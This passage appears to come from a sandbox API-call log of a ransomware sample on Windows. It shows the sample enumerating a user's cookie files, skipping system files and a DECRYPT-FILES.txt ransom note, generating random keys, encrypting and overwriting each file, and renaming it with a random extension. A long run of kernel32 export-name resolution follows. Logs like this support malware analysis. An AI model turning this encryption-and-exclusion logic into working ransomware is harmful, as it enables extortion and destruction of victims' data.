lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0182.041] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0182.041] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0182.041] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0182.041] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0182.041] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0182.041] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0182.041] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0182.041] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0182.042] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0182.042] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0182.042] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0182.042] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0182.042] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0182.042] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0182.042] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0182.042] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt.olpJv") returned 118 [0182.042] wsprintfW (in: param_1=0x36fd86c, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt.olpJv.WQ36xK") returned 125 [0182.042] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt.olpJv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt.olpjv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt.olpJv.WQ36xK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt.olpjv.wq36xk"), dwFlags=0x0) returned 1 [0182.043] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.043] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.043] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.043] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x54d8c7b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54d8c7b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xabaf5880, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@www.linkedin[1].txt.9FhO2n", cAlternateFileName="5P5NRG~1.9FH")) returned 1 [0182.044] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.linkedin[1].txt.9FhO2n", lpString2="DECRYPT-FILES.txt") returned -1 [0182.044] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.linkedin[1].txt.9FhO2n", lpString2="autorun.inf") returned -1 [0182.044] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.linkedin[1].txt.9FhO2n", lpString2="boot.ini") returned -1 [0182.044] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.linkedin[1].txt.9FhO2n", lpString2="desktop.ini") returned -1 [0182.044] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.linkedin[1].txt.9FhO2n", lpString2="ntuser.dat") returned -1 [0182.044] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.linkedin[1].txt.9FhO2n", lpString2="iconcache.db") returned -1 [0182.044] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.linkedin[1].txt.9FhO2n", lpString2="bootsect.bak") returned -1 [0182.044] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.linkedin[1].txt.9FhO2n", lpString2="ntuser.dat.log") returned -1 [0182.044] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.linkedin[1].txt.9FhO2n", lpString2="thumbs.db") returned -1 [0182.044] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.linkedin[1].txt.9FhO2n", lpString2="Bootfont.bin") returned -1 [0182.044] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@www.linkedin[1].txt.9FhO2n") returned 47 [0182.044] lstrcmpiW (lpString1="9FhO2n", lpString2="lnk") returned -1 [0182.044] lstrcmpiW (lpString1="9FhO2n", lpString2="exe") returned -1 [0182.044] lstrcmpiW (lpString1="9FhO2n", lpString2="sys") returned -1 [0182.044] lstrcmpiW (lpString1="9FhO2n", lpString2="dll") returned -1 [0182.044] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0182.044] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@www.linkedin[1].txt.9FhO2n") returned 47 [0182.044] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0182.044] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@www.linkedin[1].txt.9FhO2n" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt.9FhO2n") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt.9FhO2n" [0182.044] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.044] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt.9FhO2n" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt.9fho2n"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0182.045] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=433) returned 1 [0182.045] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0182.045] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0182.045] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0182.045] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0182.045] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0182.046] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x100) returned 1 [0182.046] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0182.046] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.047] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0182.047] CloseHandle (hObject=0x288) returned 1 [0182.047] SetFilePointerEx (in: hFile=0x284, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0182.047] WriteFile (in: hFile=0x284, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fd7c0, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fd7c0*=0x108, lpOverlapped=0x0) returned 1 [0182.048] CloseHandle (hObject=0x0) returned 0 [0182.048] CloseHandle (hObject=0x284) returned 1 [0182.048] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.048] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.048] GetTickCount () returned 0x1134e6f [0182.048] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.049] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0182.049] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0182.049] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0182.049] lstrlenA (lpString="kernel32.dll") returned 12 [0182.049] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0182.049] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0182.049] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0182.049] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0182.049] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0182.049] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0182.049] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0182.049] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0182.049] lstrlenA (lpString="ADDATOMA") returned 8 [0182.049] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0182.050] lstrlenA (lpString="ADDATOMW") returned 8 [0182.050] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0182.050] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0182.050] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0182.050] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0182.050] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0182.050] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0182.050] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0182.050] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0182.050] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0182.050] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0182.050] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0182.050] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0182.050] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0182.050] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0182.050] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0182.050] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0182.050] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0182.050] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0182.050] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0182.050] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0182.050] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0182.050] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0182.050] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0182.050] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0182.050] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0182.050] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0182.050] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0182.050] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0182.050] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0182.050] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0182.050] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0182.050] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0182.050] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0182.050] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0182.051] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0182.051] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0182.051] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0182.051] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0182.051] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0182.051] lstrlenA (lpString="BACKUPREAD") returned 10 [0182.051] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0182.051] lstrlenA (lpString="BACKUPSEEK") returned 10 [0182.051] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0182.051] lstrlenA (lpString="BACKUPWRITE") returned 11 [0182.051] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0182.051] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0182.051] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0182.051] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0182.051] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0182.051] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0182.051] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0182.051] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0182.051] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0182.051] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0182.051] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0182.051] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0182.051] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0182.051] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0182.051] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0182.051] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0182.051] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0182.051] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0182.051] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0182.051] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0182.051] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0182.051] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0182.051] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0182.051] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0182.051] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0182.052] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0182.052] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0182.052] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0182.052] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0182.052] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0182.052] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0182.052] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0182.052] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0182.052] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0182.052] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0182.052] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0182.052] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0182.052] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0182.052] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0182.052] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0182.052] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0182.052] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0182.052] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0182.052] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0182.052] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0182.052] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0182.052] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0182.052] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0182.052] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0182.052] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0182.052] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0182.052] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0182.052] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0182.052] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0182.052] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0182.052] lstrlenA (lpString="BEEP") returned 4 [0182.052] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0182.052] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0182.052] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0182.053] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0182.053] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0182.053] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0182.053] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0182.053] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0182.053] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0182.053] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0182.053] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0182.053] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0182.053] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0182.053] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0182.053] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0182.053] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0182.053] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0182.053] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0182.053] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0182.053] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0182.053] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0182.053] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0182.053] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0182.053] lstrlenA (lpString="CANCELIO") returned 8 [0182.053] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0182.053] lstrlenA (lpString="CANCELIOEX") returned 10 [0182.053] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0182.053] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0182.053] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0182.053] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0182.053] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0182.053] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0182.053] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0182.053] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0182.053] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0182.053] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0182.053] lstrcpyA 